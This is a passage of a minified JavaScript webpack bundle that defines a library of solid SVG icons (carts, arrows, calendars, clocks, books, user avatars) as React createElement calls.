a=n(7836)},5917:(e,t,n)=>{"use strict";var a=n(6290);n(8975),(0,a.Z)(console.error)},4528:(e,t,n)=>{"use strict";n.d(t,{c:()=>r});var a=n(7294);const r={add_plus_shopping_cart_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M5.862 3.76A1.75 1.75 0 0 0 4.13 2.25H2a.75.75 0 0 0 0 1.5h2.129a.25.25 0 0 1 .247.216l1.762 12.773c.059.427.27.8.572 1.069a2.5 2.5 0 1 0 4.33.442h5.17a2.5 2.5 0 1 0 2.29-1.5H7.871a.25.25 0 0 1-.247-.216l-.183-1.32 12.36-1.068a1.75 1.75 0 0 0 1.573-1.433l1.152-6.403a1.75 1.75 0 0 0-1.722-2.06H5.93l-.068-.49ZM7.75 19.25a1 1 0 1 1 2 0 1 1 0 0 1-2 0Zm9.75 0a1 1 0 1 1 2 0 1 1 0 0 1-2 0Zm-4.505-7.75v-1.245H11.75a.75.75 0 0 1 0-1.5h1.245V7.5a.75.75 0 0 1 1.5 0v1.255h1.255a.75.75 0 0 1 0 1.5h-1.255V11.5a.75.75 0 0 1-1.5 0Z",clipRule:"evenodd"})),android_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20 10.25a.75.75 0 0 1 .75.75v6a.75.75 0 0 1-1.5 0v-6a.75.75 0 0 1 .75-.75Zm-16 0a.75.75 0 0 1 .75.75v6a.75.75 0 0 1-1.5 0v-6a.75.75 0 0 1 .75-.75ZM8.05 1.4a.75.75 0 0 0-.15 1.05l1.153 1.537A6.249 6.249 0 0 0 5.75 9.5v.5h12.5v-.5a6.249 6.249 0 0 0-3.303-5.513L16.1 2.45a.75.75 0 1 0-1.2-.9l-1.41 1.879a6.266 6.266 0 0 0-2.98 0L9.1 1.55a.75.75 0 0 0-1.05-.15ZM9.74 8a.75.75 0 0 1 .75-.75h.01a.75.75 0 0 1 0 1.5h-.01A.75.75 0 0 1 9.74 8Zm3.75-.75a.75.75 0 0 0 0 1.5h.01a.75.75 0 0 0 0-1.5h-.01Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M5.75 11.5V17a2.75 2.75 0 0 0 2.75 2.75h.25V22a.75.75 0 0 0 1.5 0v-2.25h4V22a.75.75 0 0 0 1.5 0v-2.261A2.75 2.75 0 0 0 18.25 17v-5.5H5.75Z"})),angry_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM6.25 9.5A.75.75 0 0 1 7 8.75c.549 0 1.303.068 1.982.285.632.202 1.458.619 1.704 1.493.043.152.064.31.064.472 0 .527-.197 1.1-.77 1.322-.493.192-.974-.001-1.25-.237-.277-.238-.62-.793-.262-1.39.044-.074.096-.14.153-.2a2.804 2.804 0 0 0-.095-.031C8.04 10.309 7.45 10.25 7 10.25a.75.75 0 0 1-.75-.75Zm8.768-.465c.678-.217 1.433-.285 1.982-.285a.75.75 0 0 1 0 1.5c-.451 0-1.041.059-1.526.214-.033.01-.065.021-.095.032.057.059.109.125.153.2.359.596.015 1.151-.262 1.389-.276.236-.758.429-1.25.237-.573-.223-.77-.795-.77-1.322 0-.162.021-.32.064-.472.246-.874 1.072-1.291 1.704-1.493Zm-6.347 8.3C9.262 16.153 10.58 15.5 12 15.5c1.42 0 2.738.653 3.33 1.835a.75.75 0 1 0 1.34-.67C15.763 14.847 13.83 14 12 14s-3.762.847-4.67 2.665a.75.75 0 0 0 1.34.67Z",clipRule:"evenodd"})),apple_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M20.054 8.58c-.123.096-2.287 1.337-2.287 4.095 0 3.191 2.754 4.32 2.836 4.348-.012.069-.437 1.546-1.452 3.051-.904 1.325-1.849 2.647-3.286 2.647s-1.806-.85-3.465-.85c-1.617 0-2.192.878-3.506.878-1.315 0-2.232-1.226-3.286-2.73-1.222-1.768-2.209-4.514-2.209-7.12 0-2.07.655-3.658 1.636-4.735 1-1.097 2.337-1.662 3.664-1.662 1.397 0 2.562.933 3.439.933.834 0 2.136-.989 3.725-.989.602 0 2.767.056 4.19 2.133Zm-4.945-3.904a5.04 5.04 0 0 0 .84-1.467 4.462 4.462 0 0 0 .282-1.528c0-.152-.013-.307-.04-.432-1.07.04-2.342.725-3.109 1.63-.602.697-1.164 1.797-1.164 2.913 0 .168.027.336.04.39.068.013.178.028.287.028.96 0 2.167-.654 2.864-1.534Z"})),arrow_down_bottom_downward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm1 6.25a1 1 0 1 0-2 0v6.586l-1.793-1.793a1 1 0 0 0-1.414 1.414l3.5 3.5a1 1 0 0 0 1.414 0l3.5-3.5a1 1 0 0 0-1.414-1.414L13 14.086V7.5Z",clipRule:"evenodd"})),arrow_down_bottom_downward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11 3.5a1 1 0 1 1 2 0v14.586l6.793-6.793a1 1 0 1 1 1.414 1.414l-8.5 8.5a1 1 0 0 1-1.414 0l-8.5-8.5a1 1 0 0 1 1.338-1.482l.076.068L11 18.086V3.5Z"})),arrow_down_bottom_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17.293 5.293a1 1 0 1 1 1.414 1.414L8.414 17H18a1 1 0 1 1 0 2H6a1 1 0 0 1-1-1V6a1 1 0 0 1 2 0v9.586L17.293 5.293Z"})),arrow_down_bottom_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M5.293 5.293a1 1 0 0 1 1.414 0L17 15.586V6a1 1 0 1 1 2 0v12a1 1 0 0 1-1 1H6a1 1 0 1 1 0-2h9.586L5.293 6.707a1 1 0 0 1 0-1.414Z"})),arrow_down_dropdown_maximize_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M18 8.25a.75.75 0 0 1 .53 1.28l-6 6a.75.75 0 0 1-1.06 0l-6-6A.75.75 0 0 1 6 8.25h12Z"})),arrow_left_backward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm-.293 7.957a1 1 0 0 0-1.414-1.414l-3.5 3.5a1 1 0 0 0 0 1.414l3.5 3.5a1 1 0 0 0 1.414-1.414L9.914 13H16.5a1 1 0 1 0 0-2H9.914l1.793-1.793Z",clipRule:"evenodd"})),arrow_left_backward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.293 2.793a1 1 0 1 1 1.414 1.414L5.914 11H20.5a1 1 0 1 1 0 2H5.914l6.793 6.793.068.076a1 1 0 0 1-1.406 1.406l-.076-.068-8.5-8.5a1 1 0 0 1 0-1.414l8.5-8.5Z"})),arrow_left_previous_backward_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M14.47 5.47a.75.75 0 0 1 1.28.53v12a.75.75 0 0 1-1.28.53l-6-6a.75.75 0 0 1 0-1.06l6-6Z"})),arrow_move_down_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M6.293 7.293A1 1 0 0 1 8 8v4h10a3 3 0 0 0 3-3V6a1 1 0 1 1 2 0v3a5 5 0 0 1-5 5H8v4a1 1 0 0 1-1.707.707l-5-5a1 1 0 0 1 0-1.414l5-5Z"})),arrow_move_down_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.617 7.076a1 1 0 0 1 1.09.217l5 5a1 1 0 0 1 0 1.414l-5 5A1 1 0 0 1 16 18v-4H6a5 5 0 0 1-5-5V6a1 1 0 0 1 2 0v3a3 3 0 0 0 3 3h10V8a1 1 0 0 1 .617-.924Z"})),arrow_move_up_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 18v-3a3 3 0 0 0-3-3H8v4a1 1 0 0 1-1.707.707l-5-5a1 1 0 0 1 0-1.414l5-5A1 1 0 0 1 8 6v4h10a5 5 0 0 1 5 5v3a1 1 0 1 1-2 0Z"})),arrow_move_up_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M1 18v-3a5 5 0 0 1 5-5h10V6a1 1 0 0 1 1.707-.707l5 5a1 1 0 0 1 0 1.414l-5 5A1 1 0 0 1 16 16v-4H6a3 3 0 0 0-3 3v3a1 1 0 1 1-2 0Z"})),arrow_right_forward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm1.707 6.543a1 1 0 1 0-1.414 1.414L14.086 11H7.5a1 1 0 1 0 0 2h6.586l-1.793 1.793a1 1 0 0 0 1.414 1.414l3.5-3.5a1 1 0 0 0 0-1.414l-3.5-3.5Z",clipRule:"evenodd"})),arrow_right_forward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.293 2.793a1 1 0 0 1 1.414 0l8.5 8.5a1 1 0 0 1 0 1.414l-8.5 8.5a1 1 0 1 1-1.414-1.414L18.086 13H3.5a1 1 0 1 1 0-2h14.586l-6.793-6.793-.068-.076a1 1 0 0 1 .068-1.338Z"})),arrow_right_next_forward_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M8.713 5.307a.75.75 0 0 1 .817.163l6 6a.75.75 0 0 1 0 1.06l-6 6A.75.75 0 0 1 8.25 18V6a.75.75 0 0 1 .463-.693Z"})),arrow_up_dropdown_minimize_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.527 8.418a.75.75 0 0 1 1.004.052l6 6a.75.75 0 0 1-.53 1.28H6a.75.75 0 0 1-.531-1.28l6-6 .057-.052Z"})),arrow_up_top_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M5 18V6a1 1 0 0 1 1-1h12a1 1 0 1 1 0 2H8.414l10.293 10.293.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L7 8.414V18a1 1 0 1 1-2 0Z"})),arrow_up_top_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M19 18a1 1 0 1 1-2 0V8.414L6.707 18.707a1 1 0 1 1-1.414-1.414L15.586 7H6a1 1 0 0 1 0-2h12a1 1 0 0 1 1 1v12Z"})),arrow_up_top_upward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm4.207 9.043-3.5-3.5a1 1 0 0 0-1.414 0l-3.5 3.5a1 1 0 1 0 1.414 1.414L11 9.914V16.5a1 1 0 1 0 2 0V9.914l1.793 1.793a1 1 0 0 0 1.414-1.414Z",clipRule:"evenodd"})),arrow_up_top_upward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11 20.5V5.914l-6.793 6.793a1 1 0 1 1-1.414-1.414l8.5-8.5.076-.068a1 1 0 0 1 1.338.068l8.5 8.5.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L13 5.914V20.5a1 1 0 1 1-2 0Z"})),at_a_mail_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 7c1.126 0 2.164.372 3 1a1 1 0 1 1 2 0v7a1 1 0 0 0 1 1 3 3 0 0 0 3-3v-1a9 9 0 1 0-9 9c1.64 0 3.176-.438 4.499-1.203a1 1 0 0 1 1.002 1.73A10.955 10.955 0 0 1 12 23C5.925 23 1 18.075 1 12S5.925 1 12 1s11 4.925 11 11v1a5 5 0 0 1-5 5 3.002 3.002 0 0 1-2.865-2.106A5 5 0 1 1 12 7Zm-3 5a3 3 0 1 0 6 0 3 3 0 0 0-6 0Z"})),author_user_human_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0Zm3.5 13.533c0 .672-.545 1.217-1.217 1.217H4.967a1.217 1.217 0 0 1-1.217-1.217 7.283 7.283 0 0 1 7.283-7.283h1.934a7.283 7.283 0 0 1 7.283 7.283Z"})),author_user_human_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M7.5 8a4.5 4.5 0 0 0 2.43 3.996A8.754 8.754 0 0 0 3.25 20.5c0 .414.336.75.75.75h16a.75.75 0 0 0 .75-.75 8.754 8.754 0 0 0-6.68-8.504A4.5 4.5 0 1 0 7.5 8Z"})),author_user_human_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0Zm4 14a.75.75 0 0 1-.75.75H4a.75.75 0 0 1-.75-.75v-3A4.75 4.75 0 0 1 8 13.25h8A4.75 4.75 0 0 1 20.75 18v3Z"})),author_user_human_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0ZM12 12.75c3.518 0 6.62 1.696 8.337 4.088.411.573.6 1.197.568 1.816a2.84 2.84 0 0 1-.645 1.626c-.723.902-1.951 1.47-3.26 1.47H7c-1.308 0-2.537-.568-3.26-1.47a2.838 2.838 0 0 1-.644-1.626c-.032-.62.156-1.243.568-1.816C5.38 14.446 8.483 12.75 12 12.75Z"})),book_reading_time_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M14.5 1.25a6.25 6.25 0 0 1 4.25 10.83V16a.75.75 0 0 1-.75.75H7a2.25 2.25 0 0 0 0 4.5h11a.75.75 0 0 1 0 1.5H7A3.75 3.75 0 0 1 3.25 19V7A3.75 3.75 0 0 1 7 3.25h2.92c1.141-1.23 2.77-2 4.58-2ZM7 4.75A2.25 2.25 0 0 0 4.75 7v9A3.733 3.733 0 0 1 7 15.25h10.25v-2.137A6.25 6.25 0 0 1 8.887 4.75H7Zm7.5-.5a.75.75 0 0 0-.75.75v3a.75.75 0 0 0 .415.67l2 1a.75.75 0 0 0 .67-1.34l-1.585-.794V5a.75.75 0 0 0-.75-.75Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M16 19.75a.75.75 0 0 0 0-1.5H7a.75.75 0 0 0 0 1.5h9Z"})),book_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M7 1.25A3.75 3.75 0 0 0 3.25 5v14A3.75 3.75 0 0 0 7 22.75h13a.75.75 0 0 0 .75-.75V8a.75.75 0 0 0-.75-.75H7a2.25 2.25 0 0 1 0-4.5h13a.75.75 0 0 0 0-1.5H7Zm6.75 17.25v-1.75h-3.5v1.75a.75.75 0 0 1-1.5 0v-3.092c0-.74.22-1.464.63-2.08l1.219-1.828a1.684 1.684 0 0 1 2.802 0l1.22 1.828c.41.616.629 1.34.629 2.08V18.5a.75.75 0 0 1-1.5 0Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.847 12.332a.184.184 0 0 1 .306 0l1.22 1.828c.216.326.344.701.371 1.09h-3.488a2.25 2.25 0 0 1 .372-1.09l1.219-1.828Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M17 4.25a.75.75 0 0 1 0 1.5H7a.75.75 0 0 1 0-1.5h10Z"})),calendar_date_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M8.01 12.5a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h.01Zm4-3.5a1 1 0 1 1 0 2H12a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H12a1 1 0 1 1 0-2h.01Zm4-3.5a1 1 0 1 1 0 2H16a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H16a1 1 0 1 1 0-2h.01Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M2.25 9v10.5A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-2V2a1 1 0 1 0-2 0v.75H9V2a1 1 0 1 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5V9Zm18 .75H3.75v9.75c0 .69.56 1.25 1.25 1.25h14c.69 0 1.25-.56 1.25-1.25V9.75Z",clipRule:"evenodd"})),calendar_date_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15.76 1.376a.751.751 0 0 1 1.48.247l-.104.626H21a.751.751 0 0 1 .749.75h.002v16A2.75 2.75 0 0 1 19 21.75H8a2.75 2.75 0 0 1-2.736-2.468L5.251 19v-.75H3.314a1.75 1.75 0 0 1-1.688-2.216L5.278 2.8l.043-.117A.75.75 0 0 1 6 2.25h3.614l.145-.873a.751.751 0 0 1 1.48.247l-.104.626h1.479l.145-.873a.751.751 0 0 1 1.48.247l-.104.626h1.479l.145-.873Zm2.368 14.855a2.751 2.751 0 0 1-2.65 2.018H6.75V19l.006.128A1.25 1.25 0 0 0 8 20.251h11c.69 0 1.25-.56 1.25-1.25V8.538l-2.123 7.693Zm-5.152-8.812a.75.75 0 0 0-.81-.09l-2 1a.75.75 0 0 0 .67 1.341l.5-.25-.909 3.33h-.926a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 0-1.5h-.518l1.241-4.553a.75.75 0 0 0-.248-.778Z",clipRule:"evenodd"})),calendar_date_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17 2.75V2a1 1 0 1 0-2 0v.75H9V2a1 1 0 1 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5v14A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-2Zm-13.25 7h16.5v9.75c0 .69-.56 1.25-1.25 1.25H5c-.69 0-1.25-.56-1.25-1.25V9.75Z"})),calendar_date_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M17.5 2a1 1 0 1 0-2 0v.75H13V2a1 1 0 1 0-2 0v.75H8.5V2a1 1 0 0 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5v14A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-1.5V2Zm-1.49 7a1 1 0 0 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm-3 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-5-1a1 1 0 1 1 0 2C7.457 11 7 10.552 7 10s.457-1 1.01-1Zm1 4.5a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm3-1a1 1 0 1 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm5 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-1 2.5a1 1 0 0 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm-3 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-5-1a1 1 0 1 1 0 2C7.457 18 7 17.552 7 17s.457-1 1.01-1Z",clipRule:"evenodd"})),caret_up_top_triangle_angle_arrow_upward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19 17.75c1.442 0 2.265-1.646 1.4-2.8l-7-9.333a1.75 1.75 0 0 0-2.8 0l-7 9.333c-.865 1.154-.042 2.8 1.4 2.8h14Z",clipRule:"evenodd"})),category_book_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M7 1.25A3.75 3.75 0 0 0 3.25 5v14A3.75 3.75 0 0 0 7 22.75h13a.75.75 0 0 0 .75-.75v-8H15v-3h5.75V8a.75.75 0 0 0-.75-.75H7a2.25 2.25 0 0 1 0-4.5h13a.75.75 0 0 0 0-1.5H7Zm3.5 13.5a.75.75 0 0 1 0 1.5h-3a.75.75 0 0 1 0-1.5h3Zm.75 3.75a.75.75 0 0 0-.75-.75h-3a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 .75-.75Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M17 4.25a.75.75 0 0 1 0 1.5H7a.75.75 0 0 1 0-1.5h10Z"})),category_file_documents_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M21 2.25a.75.75 0 0 1 .75.75v6.5a.75.75 0 0 1-.22.53l-1.28 1.28V18a.75.75 0 0 1-.75.75h-2.25V21a.75.75 0 0 1-.75.75H3a.75.75 0 0 1-.75-.75V5c0-.027.001-.053.004-.08A2.748 2.748 0 0 1 5 2.25h16ZM5 3.75a1.25 1.25 0 1 0 0 2.5h11.5a.75.75 0 0 1 .75.75v10.25h1.5V11c0-.199.08-.39.22-.53l1.28-1.28V3.75H5Zm5.25 10.75a.75.75 0 0 0-.75-.75h-3a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 .75-.75Zm-.75 2.25a.75.75 0 0 1 0 1.5h-3a.75.75 0 0 1 0-1.5h3Z",clipRule:"evenodd"})),category_file_documents_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M22.75 19A1.75 1.75 0 0 1 21 20.75H4A2.75 2.75 0 0 1 1.25 18V6A2.75 2.75 0 0 1 4 3.25h11.172c.73 0 1.429.29 1.944.806l2.195 2.194H21c.966 0 1.75.784 1.75 1.75v11Zm-20-1c0 .69.56 1.25 1.25 1.25h.25V8c0-.966.784-1.75 1.75-1.75h11.19l-1.134-1.134a1.25 1.25 0 0 0-.884-.366H4c-.69 0-1.25.56-1.25 1.25v12Z"})),category_file_documents_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19 3.25c.966 0 1.75.784 1.75 1.75v1.25H21c.966 0 1.75.784 1.75 1.75v11A1.75 1.75 0 0 1 21 20.75H6A1.75 1.75 0 0 1 4.25 19v-.25H3A1.75 1.75 0 0 1 1.25 17V8c0-.966.784-1.75 1.75-1.75h8.586a.25.25 0 0 0 .177-.073l2.414-2.414a1.75 1.75 0 0 1 1.237-.513H19Zm-3.586 1.5a.25.25 0 0 0-.177.073l-2.414 2.414a1.75 1.75 0 0 1-1.237.513H3a.25.25 0 0 0-.25.25v9c0 .138.112.25.25.25h1.25V11c0-.966.784-1.75 1.75-1.75h7.586a.25.25 0 0 0 .177-.073l2.414-2.414a1.75 1.75 0 0 1 1.237-.513h1.836V5a.25.25 0 0 0-.25-.25h-3.586Z",clipRule:"evenodd"})),category_file_documents_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M8.586 3.25c.464 0 .91.185 1.237.513L11.81 5.75H18a2.75 2.75 0 0 1 2.75 2.75v1.75H22a.75.75 0 0 1 .686 1.055l-4 9a.75.75 0 0 1-.686.445H2a.75.75 0 0 1-.749-.75L1.25 5c0-.966.784-1.75 1.75-1.75h5.586ZM3 4.75a.25.25 0 0 0-.25.25v11.465l2.564-5.77.052-.096A.75.75 0 0 1 6 10.25h13.25V8.5c0-.69-.56-1.25-1.25-1.25H8a.75.75 0 0 1 0-1.5h1.69l-.927-.927a.25.25 0 0 0-.177-.073H3Z",clipRule:"evenodd"})),clock_reading_time_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25 1.25 6.063 1.25 12 6.063 22.75 12 22.75ZM11 6a1 1 0 1 1 2 0v5.382l3.447 1.723.09.051a1 1 0 0 1-.89 1.78l-.094-.041-4-2A1 1 0 0 1 11 12V6Z",clipRule:"evenodd"})),clock_reading_time_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11 2.5V1.296A10.753 10.753 0 0 0 1.296 11H2.5a1 1 0 1 1 0 2H1.296A10.753 10.753 0 0 0 11 22.704V21.5a1 1 0 1 1 2 0v1.204A10.753 10.753 0 0 0 22.704 13H21.5a1 1 0 1 1 0-2h1.204A10.753 10.753 0 0 0 13 1.296V2.5a1 1 0 1 1-2 0Zm5.707 4.793a1 1 0 0 0-1.414 0L12 10.586l-1.793-1.793-.076-.068a1 1 0 0 0-1.338 1.482L10.586 12l-.793.793a1 1 0 1 0 1.414 1.414l.793-.793.793.793.076.068a1 1 0 0 0 1.406-1.406l-.068-.076-.793-.793 3.293-3.293a1 1 0 0 0 0-1.414Z",clipRule:"evenodd"})),clock_reading_time_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15.5 1.25a7.25 7.25 0 0 1 7.25 7.25 7.222 7.222 0 0 1-2.001 4.997L20.75 16A6.75 6.75 0 0 1 14 22.75H2a.75.75 0 0 1-.75-.75v-7A6.75 6.75 0 0 1 8 8.25h.257a7.248 7.248 0 0 1 7.243-7Zm0 1.5a5.75 5.75 0 1 0 0 11.5 5.75 5.75 0 0 0 0-11.5ZM14 18.5a1 1 0 0 0-1-1H6a1 1 0 1 0 0 2h7a1 1 0 0 0 1-1Zm-5-5a1 1 0 1 1 0 2H6a1 1 0 1 